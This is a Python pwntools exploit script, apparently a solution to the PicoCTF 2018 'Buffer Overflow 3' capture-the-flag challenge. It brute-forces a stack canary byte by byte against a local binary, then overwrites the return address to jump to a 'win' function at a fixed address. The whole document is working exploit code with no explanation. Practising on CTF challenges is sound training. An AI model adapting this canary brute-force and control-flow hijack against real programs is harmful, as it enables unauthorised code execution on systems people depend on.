Pico CTF 2018 Buffer Overflow 3

exploit.py

from pwn import *

canary = ""

for j in range(0,4):
    for i in range(0,256):
        p = process("./vuln")
        payload ="A"*0x20+canary+chr(i)
        print p.recvuntil("> ")
        p.sendline(str(len(payload)))
        print p.recvuntil("> ")
        p.send(payload)

        try:
            print p.recvuntil("Stack")
        except:
            canary += chr(i)
            break
        p.close()


print "Found Canary = " + canary

p = process("./vuln")
print p.recvuntil("> ")

win = 0x080486EB
payload = "A"*0x20
payload += canary
payload += "A"*(0xC+4)
payload += p32(win)

p.sendline(str(len(payload)))

print p.recvuntil("> ")
p.send(payload)
print p.recv(2048)